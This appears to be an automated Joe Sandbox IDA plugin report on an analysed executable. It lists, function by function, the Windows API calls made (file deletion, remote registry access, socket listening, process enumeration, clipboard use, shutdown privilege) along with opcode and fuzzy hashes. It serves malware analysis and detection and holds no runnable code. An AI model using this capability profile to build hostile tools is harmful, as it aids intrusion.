                                                                                                                • API String ID: 3996160137-0
                                                                                                                • Opcode ID: ed20d17a1e91926e7623dc7b2f496b55cdd72172c16250861df8bcd337ebdf56
                                                                                                                • Instruction ID: 7cf0f1db4f19ae91bb82fd717f5b5a11ea69a50776b3c675890074aa0fbcfd8d
                                                                                                                • Opcode Fuzzy Hash: ed20d17a1e91926e7623dc7b2f496b55cdd72172c16250861df8bcd337ebdf56
                                                                                                                • Instruction Fuzzy Hash: BA51077190020AAFDF00DFA4DC45EEEBB79FF04714F14812AE929A6291EB359A05DF70
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D431B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D431DA
                                                                                                                  • Part of subcall function 00D87C0C: GetFileAttributesW.KERNEL32(?,00D86A7B), ref: 00D87C0D
                                                                                                                • _wcscat.LIBCMT ref: 00D86E7E
                                                                                                                • __wsplitpath.LIBCMT ref: 00D86E99
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00D86EAE
                                                                                                                • _wcscpy.LIBCMT ref: 00D86EDD
                                                                                                                • _wcscat.LIBCMT ref: 00D86EEF
                                                                                                                • _wcscat.LIBCMT ref: 00D86F01
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00D86F0E
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D86F22
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00D86F3D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 2643075503-1173974218
                                                                                                                • Opcode ID: 781e010814d7ee7789372b6bd3c071d5a8df3fe7a208a4ad2654df4056a9fab1
                                                                                                                • Instruction ID: 453e036bf692b25979fe0cb14c80cc74eb80f1059a6c9bf73a96c851bbce1d1a
                                                                                                                • Opcode Fuzzy Hash: 781e010814d7ee7789372b6bd3c071d5a8df3fe7a208a4ad2654df4056a9fab1
                                                                                                                • Instruction Fuzzy Hash: 1D21C172408345AEC611EBA4D8859DBBBDC9F59324F084A6AF5E4C3142EA30D60D8BB2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                • API String ID: 0-2893523900
                                                                                                                • Opcode ID: 2b6d67ae9b37de36310937bb56b62546e11a9dfe48ecac201960d6b691d08de8
                                                                                                                • Instruction ID: 4a245ff098c3918e7afac84a76098468c61f3f059a6c4f849e39903d1b45decd
                                                                                                                • Opcode Fuzzy Hash: 2b6d67ae9b37de36310937bb56b62546e11a9dfe48ecac201960d6b691d08de8
                                                                                                                • Instruction Fuzzy Hash: 84625F71E0021A9BDF24DF59D881BAEB7B5BF49310F14816AE846EB281D770DE41CBA1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00DA3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DA2AA6,?,?), ref: 00DA3B0E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DA317F
                                                                                                                  • Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
                                                                                                                  • Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00DA321E
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00DA32B6
                                                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00DA34F5
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00DA3502
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1240663315-0
                                                                                                                • Opcode ID: 2bda794dccc4616e3dcaf0f5f5de07771e5b2c09d82144fdb92eb7c6396b7b03
                                                                                                                • Instruction ID: de561b3b2b9f772c7d81950c68a51b0b4f30b7e448c00354b7b1741a9c542851
                                                                                                                • Opcode Fuzzy Hash: 2bda794dccc4616e3dcaf0f5f5de07771e5b2c09d82144fdb92eb7c6396b7b03
                                                                                                                • Instruction Fuzzy Hash: 8FE16D71604301AFCB15DF28C895D2ABBEAEF89314F04896DF44ADB261DB31ED05CB61
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1737998785-0
                                                                                                                • Opcode ID: 4eb299ffefe8313fa1989e14865a72fdc6bea6d49c6956e5e676834d2843228f
                                                                                                                • Instruction ID: a6b3d54052b72fb335e2e2ef4fd8a0c8425b5c9902553b3cabbfe4674f791d15
                                                                                                                • Opcode Fuzzy Hash: 4eb299ffefe8313fa1989e14865a72fdc6bea6d49c6956e5e676834d2843228f
                                                                                                                • Instruction Fuzzy Hash: 4E219F31254212AFDB00AF24DC49F2DBBA9EF44721F048029F94ADB3A1DB30E940DBB4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D7A857: CLSIDFromProgID.OLE32 ref: 00D7A874
                                                                                                                  • Part of subcall function 00D7A857: ProgIDFromCLSID.OLE32(?,00000000), ref: 00D7A88F
                                                                                                                  • Part of subcall function 00D7A857: lstrcmpiW.KERNEL32(?,00000000), ref: 00D7A89D
                                                                                                                  • Part of subcall function 00D7A857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00D7A8AD
                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00D9C6AD
                                                                                                                • _memset.LIBCMT ref: 00D9C6BA
                                                                                                                • _memset.LIBCMT ref: 00D9C7D8
                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00D9C804
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00D9C80F
                                                                                                                Strings
                                                                                                                • NULL Pointer assignment, xrefs: 00D9C85D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                • API String ID: 1300414916-2785691316
                                                                                                                • Opcode ID: 6da8f4b8aca3822d0171536e3337c1517e49ff1bd5b7862cd4216f7ace204903
                                                                                                                • Instruction ID: 02b7d271c66247fa8d190e234dc1b4ef3e33633071ce111784aff555793d56d9
                                                                                                                • Opcode Fuzzy Hash: 6da8f4b8aca3822d0171536e3337c1517e49ff1bd5b7862cd4216f7ace204903
                                                                                                                • Instruction Fuzzy Hash: 3F912671D00219ABDF10DFA4DC81EDEBBB9EF08710F20816AE519A7291EB705A45CFB0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00D924F6
                                                                                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00D92526
                                                                                                                • _wcscmp.LIBCMT ref: 00D9253A
                                                                                                                • _wcscmp.LIBCMT ref: 00D92555
                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00D925F3
                                                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00D92609
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 713712311-438819550
                                                                                                                • Opcode ID: 544550a8b8bebef871ecbf55a9f626be7822ad7613cdd966b5105e0c0cfc1577
                                                                                                                • Instruction ID: a71db15fe4bfdb3e92c047dcd5fb88baafc4de3e66a386079a4afaca13e174a1
                                                                                                                • Opcode Fuzzy Hash: 544550a8b8bebef871ecbf55a9f626be7822ad7613cdd966b5105e0c0cfc1577
                                                                                                                • Instruction Fuzzy Hash: 95415C7194021AAFCF54DFA4CC59AEEBBB4FF19310F144456E815A2291EB309A94CFB0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                • API String ID: 0-1546025612
                                                                                                                • Opcode ID: 7dbad8315e41b8918c5a4563805042342fc8147779042348b3846f5bc53f5f9a
                                                                                                                • Instruction ID: fd4ad38d345abb3e75835ffcc5772048e96cc6af11bffa9419b7e24e318a77d7
                                                                                                                • Opcode Fuzzy Hash: 7dbad8315e41b8918c5a4563805042342fc8147779042348b3846f5bc53f5f9a
                                                                                                                • Instruction Fuzzy Hash: 4E928F71E1021ACBDF24CF59C894BAEB7B1BB54314F1842AAE95AA7280D770DD81DF70
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 0a53a14f654069ae71108865adf1d6d53138d76d356ba5f85f83aeb07978c546
                                                                                                                • Instruction ID: 9e96c5ef76ee24f236c02b6fc1368a87f36ee1f9e3c374a9048d360cc7e40ce1
                                                                                                                • Opcode Fuzzy Hash: 0a53a14f654069ae71108865adf1d6d53138d76d356ba5f85f83aeb07978c546
                                                                                                                • Instruction Fuzzy Hash: 47127971A00609DBDF04DFA9D991AEEB7F5FF48300F248569E846E7250EB35A911CB70
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D7BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D7BF0F
                                                                                                                  • Part of subcall function 00D7BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D7BF3C
                                                                                                                  • Part of subcall function 00D7BEC3: GetLastError.KERNEL32 ref: 00D7BF49
                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00D8830C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                                                • API String ID: 2234035333-194228
                                                                                                                • Opcode ID: bea38faef56d385eb61e99884c10b69ff3340a5c3b86f0dabd2343bf341b8510
                                                                                                                • Instruction ID: 8194ef7593ffae7305edd33a986d657f0a8f59dd548ef1b3d93cba153697a144
                                                                                                                • Opcode Fuzzy Hash: bea38faef56d385eb61e99884c10b69ff3340a5c3b86f0dabd2343bf341b8510
                                                                                                                • Instruction Fuzzy Hash: 7001A771650316ABE76836789C4AFBB7658DB11F91F580425F953D11D1EE609C00A3B4
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00D99235
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00D99244
                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00D99260
                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00D9926F
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00D99289
                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00D9929D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279440585-0
                                                                                                                • Opcode ID: 18340c8c51257ff6d899d0cfa64f59daaee1e6907fb55617184201ca596c0738
                                                                                                                • Instruction ID: 4aee355aedeca4f78c36052ba8f9d4cd4961fe389899513ae94bed8a2678fcef
                                                                                                                • Opcode Fuzzy Hash: 18340c8c51257ff6d899d0cfa64f59daaee1e6907fb55617184201ca596c0738
                                                                                                                • Instruction Fuzzy Hash: 94217A35600201AFCB10EF68CC95B6EB7AAEF44724F148169F956AB3D1DB30AD45CB71
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00D86F7D
                                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00D86F8D
                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00D86FAC
                                                                                                                • __wsplitpath.LIBCMT ref: 00D86FD0
                                                                                                                • _wcscat.LIBCMT ref: 00D86FE3
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00D87022
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                • String ID:
                                                                                                                • API String ID: 1605983538-0
                                                                                                                • Opcode ID: 19ca042cc2d7121af1b0bf88d3a1340d476bf14bc3c3357918071d752ab206f7
                                                                                                                • Instruction ID: dac83a2872410f8dd56032043d9839e6c84f38e8c55ae253ae340fbeaaa44a91
                                                                                                                • Opcode Fuzzy Hash: 19ca042cc2d7121af1b0bf88d3a1340d476bf14bc3c3357918071d752ab206f7
                                                                                                                • Instruction Fuzzy Hash: 96218E71904219ABDB11ABA0CC88FEEB7BDAB49304F2404A9F645E3241E771DF84CB71
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D6010A: std::exception::exception.LIBCMT ref: 00D6013E
                                                                                                                  • Part of subcall function 00D6010A: __CxxThrowException@8.LIBCMT ref: 00D60153
                                                                                                                • _memmove.LIBCMT ref: 00DB3020
                                                                                                                • _memmove.LIBCMT ref: 00DB3135
                                                                                                                • _memmove.LIBCMT ref: 00DB31DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1300846289-0
                                                                                                                • Opcode ID: 12d61fdcc38582c8df5f2a5610d27c1a154e73a36e1c04d571b1eeb1dc6e8bed
                                                                                                                • Instruction ID: 4820c76ee3a99d294223c35245aea32472f6169b3d10a5c920980871261f508f
                                                                                                                • Opcode Fuzzy Hash: 12d61fdcc38582c8df5f2a5610d27c1a154e73a36e1c04d571b1eeb1dc6e8bed
                                                                                                                • Instruction Fuzzy Hash: B3029E71A00209EBDF04DF68C981ABEBBF5EF48340F148069E806DB255EB35DA15DBB5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D9ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00D9ACF5
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00D9973D
                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00D99760
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 4170576061-0
                                                                                                                • Opcode ID: cd37f80fc387601be58bbf0f2b2763be3505f55f4b8e3f66d7dcfcaa6f663e44
                                                                                                                • Instruction ID: 5c818838aeaaee64cd333d8f678661e365987a2c7be29bbe2e7630a8ed28c717
                                                                                                                • Opcode Fuzzy Hash: cd37f80fc387601be58bbf0f2b2763be3505f55f4b8e3f66d7dcfcaa6f663e44
                                                                                                                • Instruction Fuzzy Hash: 29419E74600201AFDB10AF68CC82E7EB7EAEF44764F14805CF956AB392DA749D058BB1
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00D8F37A
                                                                                                                • _wcscmp.LIBCMT ref: 00D8F3AA
                                                                                                                • _wcscmp.LIBCMT ref: 00D8F3BF
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00D8F3D0
                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00D8F3FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 2387731787-0
                                                                                                                • Opcode ID: 547c1eb6d3483b71db195a4eb33fddd83477e8f261747aa05aef2348d56e08c8
                                                                                                                • Instruction ID: 31a3e7842cebf76a275901f7acd2e44df1105b58321be4b7671e287f6fdbe601
                                                                                                                • Opcode Fuzzy Hash: 547c1eb6d3483b71db195a4eb33fddd83477e8f261747aa05aef2348d56e08c8
                                                                                                                • Instruction Fuzzy Hash: 71418E356047029FCB04EF68C490E9AB7E5FF49324F14416EE95ACB3A1DB31A945CBB1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
